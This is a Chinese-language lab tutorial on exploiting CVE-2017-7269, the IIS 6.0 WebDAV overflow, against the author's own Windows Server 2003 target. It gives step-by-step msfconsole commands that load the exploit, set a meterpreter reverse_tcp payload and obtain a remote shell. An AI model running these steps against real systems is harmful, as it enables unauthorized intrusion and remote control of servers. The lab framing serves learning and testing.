配置环境:Windows server 2003 靶机
kali2.0以上版本
前言:做实验之前要确定一下靶机与攻击主机可以互相通信
一、配置Windows server 2003 靶机
1、打开添加/删除windows程序点击添加/删除windows组件
2、安装iis6.0中间件:
3、打开iis将iis中的webDAV改为允许
4、打开网站找到默认网站右击属性,将ip地址改为本机ip地址
这个时候呢我们的靶机已经配置完毕了,接下来我们来配置我们的kali
二、开启kali
(第一次使用msfconsole的时候我们要配置一下数据库连接问题,具体请看我的上一篇文章)
1、接下来我们将下载好的exp传到/usr/share/metasploit-framework/modules/exploits/windows/iis目录下
(这里我将cve-2017-7269的名字改为了cve_2017_7269,因为我发现我名字是cve-2017-7269的话在msfconsole中查询不到上传成功并且进不去exp)
2、打开我们的msfconsole,并且查看一下是否传入成功
search cve_2017_7269
3、然后进入到exp里面
use exploits/windows/iis/cve_2017_7269
4、查看源配置:
show options
5、设置靶机IP、靶机端口、攻击IP、对方网站、返回载荷:
命令格式如下:
设置靶机IP: set RHOST 靶机ip
设置靶机端口(上图可见,默认端口为80,这里我靶机的端口改为了8080,如果你们没改的话这里不用设置):set HTTPHOST 对方网站
设置返回载荷:set payload windows/meterpreter/reverse_tcp
设置攻击IP:set LHOST 攻击主机IP
6、进行溢出
exploit
7、获取shell:
shell